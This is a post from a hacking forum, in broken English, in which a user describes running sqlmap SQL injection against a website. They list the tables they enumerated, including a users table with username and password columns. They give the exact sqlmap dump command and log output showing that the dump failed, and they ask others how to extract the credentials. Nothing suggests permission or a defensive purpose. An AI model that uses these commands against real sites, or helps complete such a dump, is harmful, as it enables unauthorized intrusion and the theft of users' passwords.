
12.11.2017, 23:56
|
|
Новичок
Регистрация: 12.11.2017
Сообщений: 9
Провел на форуме: 2953
Репутация:
0
|
|
hello everybody , i use sqlmap then query and get all name table and name columns for ready ,but when i do a dump :
| item |
| location |
| profile_pic |
| rdreamboard26 |
| refbrgy |
| refcitymun |
| refprovince |
| refregion |
| region |
| reply |
| reply_new |
| sub_category |
| test |
| test2 |
| users
-----------------
and column of Table users
| username
| password
-----------------
so i use dump
sqlmap -u "http:website.com" -D hotgamja -T users --dump --no-cast --flush-session --threads=5 --eta --batch
and
[07:41:26] [INFO] fetching columns for table 'users' in database 'hotgamja'
[07:41:35] [INFO] the SQL query used returns 2 entries
[07:41:35] [INFO] starting 5 threads
[07:45:35] [INFO] fetching entries for table 'users' in database 'hotgamja'
[07:45:35] [WARNING] the SQL query provided does not return any output
[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'
[07:45:35] [INFO] retrieved:
[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'
[07:45:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/
and nothing retrieved
so pls help me how can i do it bestter for get access to the data when dump
help me pls icq : 692615965
thank so much
|
|
|